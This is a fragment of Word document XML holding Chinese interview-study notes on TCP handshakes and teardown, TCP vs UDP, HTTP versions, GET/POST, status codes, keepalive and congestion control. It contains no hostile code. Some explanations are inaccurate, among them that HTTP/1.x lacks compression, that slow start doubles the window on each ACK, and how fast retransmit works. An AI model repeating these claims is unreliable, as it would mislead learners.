          <w:numId w:val="2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确认对方可达：在 TCP 连接建立之前，发送方并不能确认对方是否能够接收自己的数据包，因此需要通过“三次握手”确认对方的可达性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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防止已失效的连接请求报文段突然又传送到了服务端，因而产生错误：假设客户端发送了一个 SYN 报文段，但由于网络原因或者其他原因导致该报文丢失，如果此时客户端再次发送一个 SYN 报文段，这个新的 SYN 报文段就有可能在该失效的 SYN 报文段之前到达服务端，从而导致服务端错误地认为客户端又发起了一个新的连接请求。如果只有两次握手，服务端就会错误地认为客户端已经建立了连接，从而出现通信混乱的情况。而通过“三次握手”，服务端可以确认客户端真正发起了连接请求，避免出现这种错误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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防止过多的连接请求：如果只有两次握手，则会出现一种情况，即客户端发出了一个连接请求，但由于网络原因等原因，导致该请求在传输过程中被延迟了一段时间，此时客户端重新发起了一个连接请求，并成功建立连接。然而原来那个延迟的连接请求还在传输，可能会导致服务端资源的浪费。通过三次握手，可以使服务端能够及时地关闭已经失效的连接请求，避免资源的浪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综上所述，三次握手可以确保通信的可靠性和安全性，避免出现连接请求和连接建立的混乱情况，并防止资源的浪费。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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为什么需要四次挥手？三次不行？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TCP 协议中，进行通信结束时需要进行“四次挥手”（four-way handshake）过程，而不是“三次挥手”，主要是因为 TCP 连接是双向的，需要确保双方都能够成功关闭连接。</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具体过程如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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客户端发送一个 FIN 报文，请求关闭连接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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服务端接收到 FIN 报文后，发送一个 ACK 报文，确认收到客户端的关闭请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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服务端发送一个 FIN 报文，请求关闭连接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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客户端接收到服务端的 FIN 报文后，发送一个 ACK 报文，确认收到服务端的关闭请求。</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为了保证双方都能够正确关闭连接，进行“四次挥手”过程是必要的。具体原因如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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TCP 连接是双向的：TCP 连接是双向的，因此需要进行“四次挥手”过程，确保双方都能够成功关闭连接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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可能存在未发送的数据：在关闭连接之前，双方可能还有未发送完的数据，因此需要进行“四次挥手”过程，确保数据能够正常传输完毕。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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确认对方收到关闭请求：客户端发送关闭请求后，服务端需要确认已经收到请求，并停止向客户端发送数据。如果只进行“三次挥手”，服务端就无法确认客户端是否已经停止向自己发送数据，容易导致服务端资源的浪费。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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等待可能丢失的最后一个 ACK 报文：在最后一个 ACK 报文发送后，可能会由于网络原因等导致该报文丢失。如果没有进行“四次挥手”，服务端就会认为客户端仍然能够接收数据，从而造成服务端资源的浪费。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综上所述，进行“四次挥手”过程可以确保 TCP 连接的正常关闭，并避免出现资源的浪费。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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TCP与UDP有哪些区别？各自应用场景？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TCP（Transmission Control Protocol）和 UDP（User Datagram Protocol）是两种常用的网络传输协议，它们的主要区别包括以下几个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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连接性：TCP 是面向连接的协议，传输数据之前需要建立连接，而 UDP 是无连接的协议，发送数据之前不需要建立连接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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可靠性：TCP 提供可靠的数据传输服务，确保数据能够被正确无误地传输和接收，而 UDP 不提供可靠性保证，数据发送后无法保证是否能够被正确接收。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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数据传输方式：TCP 采用流式传输方式，将数据拆分为多个数据包并按顺序传输，而 UDP 则是将数据直接打包成数据包进行传输。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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延迟和带宽：由于 TCP 提供了可靠性保证，数据传输需要进行确认、重传等操作，因此 TCP 的传输延迟相对较大，而 UDP 的传输延迟较小。另外，TCP 采用拥塞控制算法来控制带宽，而 UDP 不进行带宽控制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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应用场景：TCP 适用于要求数据传输可靠性较高的场景，如文件传输、电子邮件等；UDP 适用于对传输质量要求不高，但对实时性要求较高的场景，如视频会议、在线游戏等。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综上所述，TCP 和 UDP 在应用场景和特点方面存在较大的差异，需要根据实际需要进行选择。如果需要可靠的数据传输和较高的传输质量，应选择 TCP；如果需要较低的传输延迟和较高的实时性，应选择 UDP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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HTTP1.0，1.1，2.0 的版本区别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HTTP1.0、HTTP1.1和HTTP2.0是HTTP协议的不同版本，它们之间存在以下几个区别：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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和响应方式：HTTP1.0每次请求都需要建立一个TCP连接，请求发送后立即关闭连接，响应也一样；HTTP1.1支持持久连接，可以在同一个TCP连接中发送多个请求和响应；HTTP2.0则支持多路复用，可以在同一个TCP连接中同时发送多个请求和响应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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压缩方式：HTTP1.0和HTTP1.1不支持数据压缩，而HTTP2.0支持使用HPACK算法对数据进行压缩，从而减少数据传输量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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请求头和响应头：HTTP1.0和HTTP1.1的请求头和响应头都是以纯文本方式传输，而HTTP2.0使用了二进制格式，更加高效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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安全性：HTTP1.0和HTTP1.1的安全性较差，需要使用HTTPS协议进行加密；HTTP2.0则将TLS加密纳入了协议规范，可以直接在HTTP2.0协议上进行数据加密。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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性能方面：HTTP2.0相对于HTTP1.0和HTTP1.1，在数据传输效率、响应速度、带宽利用率等方面都有显著的提升。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总的来说，HTTP2.0是HTTP协议的一个重大升级版本，它在多方面对HTTP1.0和HTTP1.1进行了改进和优化，从而提升了Web应用的性能和安全性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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POST和GET有哪些区别？各自应用场景？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POST和GET是HTTP协议中最常见的两种请求方法，它们的主要区别在于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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GET是一种请求方法，用于请求特定资源，通常用于获取数据。POST是一种请求方法，用于提交数据，通常用于新增或更新数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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参数传递</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GET请求将请求参数放在URL中，通过问号“?”将URL和参数分隔开，多个参数之间使用“&amp;”符号分隔。POST请求将请求参数放在请求体中，与请求头分隔开，参数没有长度限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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GET请求的参数在URL中可见，因此相对不安全。POST请求的参数在请求体中，不可见，相对较安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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幂等性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GET请求是幂等的，多次请求得到的结果相同。POST请求不是幂等的，多次请求可能会产生不同的结果。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基于以上区别，它们各自适用于不同的场景：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GET请求适用于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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获取数据，请求的资源无副作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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请求参数较少，请求的数据量不大</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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请求参数可以在URL中显示</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POST请求适用于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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新增或更新数据，请求的资源有副作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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请求参数较多，请求的数据量较大</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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请求参数需要保密，不能在URL中显示</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综上所述，GET和POST都是常用的HTTP请求方法，各自有适用的场景。需要根据具体的需求来选择使用哪种请求方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 哪些常用的状态码及使用场景？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HTTP协议中定义了许多状态码，常见的状态码及其使用场景如下：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1xx（信息性状态码）：表示请求已经接收，继续处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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100 Continue：服务器已经接收到请求头，并且客户端应该继续发送请求体。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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101 Switching Protocols：客户端请求切换协议，服务器已经确认并进行了切换。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2xx（成功状态码）：表示请求已经成功处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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200 OK：表示请求已经成功，服务器返回的响应数据包含请求的内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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201 Created：表示请求已经成功，并且服务器创建了新的资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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204 No Content：表示请求已经成功，但是响应数据不包含任何内容。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3xx（重定向状态码）：表示客户端需要进行额外的操作才能完成请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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301 Moved Permanently：请求的资源已经被永久性地移动到了一个新的位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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302 Found：请求的资源已经被临时性地移动到了一个新的位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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304 Not Modified：客户端的缓存资源仍然有效，可以直接使用。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4xx（客户端错误状态码）：表示客户端发送的请求有错误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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400 Bad Request：表示请求格式错误，服务器无法理解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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401 Unauthorized：表示需要进行身份认证才能访问请求的资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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403 Forbidden：表示服务器理解请求，但是拒绝响应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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404 Not Found：表示请求的资源不存在。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5xx（服务器错误状态码）：表示服务器在处理请求时发生了错误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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500 Internal Server Error：表示服务器内部错误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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502 Bad Gateway：表示服务器作为网关或代理时收到了无效的响应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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503 Service Unavailable：表示服务器暂时无法处理请求，一般是由于服务器过载或维护。</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以上是常见的HTTP状态码及其使用场景，了解这些状态码有助于我们在进行网络编程或者Web开发时更好地理解HTTP协议，减少网络请求出现问题的可能性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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HTTP状态码301和302的区别，都有哪些用途？</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HTTP状态码301和302都是重定向状态码，表示服务器将客户端请求的资源移动到了一个新的位置。它们的区别在于重定向的类型和缓存处理方式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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301 Moved Permanently</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301状态码表示请求的资源已经永久性地移动到了一个新的位置。客户端收到这个状态码后，应该更新所有指向原资源的链接，将它们指向新的资源位置。搜索引擎也会把这个页面的权重传递到新的页面，这样做有利于SEO。301状态码的响应通常会包含一个Location头部，指向新的资源位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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302 Found</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302状态码表示请求的资源临时性地移动到了一个新的位置。客户端收到这个状态码后，可以继续访问原始的资源位置，也可以使用Location头部指向的新资源位置。搜索引擎不会把这个页面的权重传递到新的页面。302状态码的响应通常也会包含一个Location头部，指向新的资源位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301和302状态码的应用场景：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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301状态码适用于网站的重构、域名变更、页面地址变更等永久性变更的情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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302状态码适用于临时性的页面跳转，例如网站维护、短期链接变更等。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需要注意的是，301和302状态码的处理方式可能会对缓存产生影响。301状态码会被大部分浏览器和搜索引擎缓存，而302状态码则不会被缓存。如果需要缓存某个页面，应该使用301状态码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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在交互过程中如果数据传送完了，还不想断开连接怎么办，怎么维持？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如果在数据传输完成后，仍然需要维持连接，可以使用 TCP 协议中的“保持连接”机制，也称为“TCP keepalive”。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 TCP 连接的一方（客户端或服务端）长时间没有收到对方发送的数据时，就会发送一个带有 ACK 标志的空数据包（即不带数据的 TCP 报文）给对方，以确认对方是否仍然存在。如果对方没有响应，则认为连接已经失效，可以进行连接的关闭。</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Java 中，可以通过在 Socket 对象上设置 setKeepAlive(true) 方法启用 TCP keepalive 机制。例如：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Socket socket = new Socket("127.0.0.1", 8080);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socket.setKeepAlive(true);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需要注意的是，TCP keepalive 机制并不能保证连接的可靠性，它只能检测到对方是否已经失效。如果需要保证连接的可靠性，建议使用心跳机制或其他的健康检查方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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 如何实现长连接？在什么时候会超时？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HTTP/1.0 协议默认采用短连接方式，即每次请求/响应后立即关闭连接。而 HTTP/1.1 协议支持长连接方式，也称为持久连接（persistent connection）或者连接重用（connection reuse）。通过使用长连接，可以在一次 TCP 连接中发送多个 HTTP 请求，减少了连接建立和关闭的时间开销，提高了网络性能。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实现长连接的方式是在 HTTP 请求头部添加 Connection: keep-alive 字段，告诉服务端该连接可以保持长连接。服务端在发送响应后，可以选择保持连接打开，等待下一个请求的到来。</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在长连接中，客户端和服务端之间没有明确的断开连接操作，因此可能存在连接长时间空闲的情况。为了防止资源的浪费，HTTP 服务器会设置一个超时时间，即当连接一段时间没有请求时，服务器会自动关闭连接。超时时间可以通过服务器的配置进行设置。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一般情况下，HTTP 服务器会在发送完响应后，在响应头部添加一个 Keep-Alive 字段，告知客户端该连接可以被保持打开一段时间，客户端可以在该时间内重用该连接。超时时间可以在该字段中进行设置，如：</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codeKeep-Alive: timeout=5, max=100</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表示服务器会在 5 秒钟内保持连接打开，最多可以发送 100 个请求。</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在使用长连接的情况下，如果服务端出现了异常情况（如内存泄漏、死循环等），长时间不处理请求，可能会导致连接阻塞。因此，为了保证服务端的可靠性，需要设置合理的超时时间，避免出现连接阻塞的情况</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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TCP 如何保证有效传输及拥塞控制原理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 保证有效传输主要通过以下机制：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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确认机制：TCP 采用可靠的数据传输，每个数据包都需要接收方发送确认消息（ACK）进行确认，发送方才能知道数据是否已经成功传输，如果未收到确认，发送方会进行重传。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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序列号机制：TCP 中每个数据包都有一个序列号，序列号可以用于标记数据包的顺序，以及区分重复数据包。接收方会使用序列号对数据包进行重组和排序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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滑动窗口机制：TCP 中发送方和接收方都维护一个滑动窗口，用于控制流量，发送方只有在接收方的滑动窗口中有可用的空间时才能发送数据包。滑动窗口的大小可以动态调整，以适应不同的网络环境和流量状况。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 的拥塞控制机制主要是为了防止网络拥塞而设计的。当网络负载过高时，可能会出现网络拥塞的情况，导致数据包丢失、延迟增加等问题。TCP 的拥塞控制主要包括以下几个方面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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慢启动：在建立连接或发生丢包后，TCP 发送方会逐渐增加发送数据包的数量，以探测网络的可用带宽。初始时，发送方会以一个比较小的发送窗口开始发送数据包，之后每收到一个确认消息就将发送窗口大小加倍，直到达到一个阈值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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拥塞避免：在发送窗口大小达到阈值后，发送方会进入拥塞避免状态，此时每收到一个确认消息，发送方只会将发送窗口大小增加一个 MSS（最大报文段长度）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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快重传：如果接收方连续收到了两个相同的数据包，即收到了一个新的数据包和之前已经收到过的数据包，接收方会立即发送一个重复确认消息，通知发送方立即重传未收到的数据包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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快恢复：当发送方收到三个重复确认消息时，说明网络中可能存在拥塞，发送方会将发送窗口大小减半，并立即进入快恢复状态，此时发送方会继续发送数据包，而不是等待超时后再进行慢启动。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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超时重传：如果发送方在一定时间内没有收到确认消息，就会认为数据包丢失，立即进行超时重传。</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通过这些机制，TCP 可以在网络中保证数据的可靠传输，同时避免网络拥塞，确保网络的稳定性和可靠性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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IP地址有哪些分类？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IP地址通常根据网络规模和分配方式等不同特点进行分类，主要包括以下几类：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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IPv4地址：IPv4是最常见的IP地址格式，使用32位二进制数表示，通常以点分十进制方式表示，如192.168.1.1。由于IPv4地址空间有限，已经不足以满足当前的互联网需求，因此IPv6正在逐步取代IPv4。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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IPv6地址：IPv6是下一代IP地址协议，使用128位二进制数表示，通常以冒号分隔的16进制数字表示，如2001:0db8:85a3:0000:0000:8a2e:0370:7334。IPv6地址空间远远超过IPv4，可以提供更多的IP地址，以支持更广泛的应用场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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公网IP地址：公网IP地址是指可以在互联网上被路由器识别和访问的IP地址，通常由互联网服务提供商（ISP）分配给用户，可以直接访问公共网络，如访问互联网等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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私有IP地址：私有IP地址是指在本地网络内使用的IP地址，用于在局域网内进行通信。私有IP地址通常是在RFC 1918中定义的地址，如10.0.0.0/8、172.16.0.0/12和192.168.0.0/16。私有IP地址不能直接访问公共网络，需要使用网络地址转换（NAT）等技术进行转换和访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
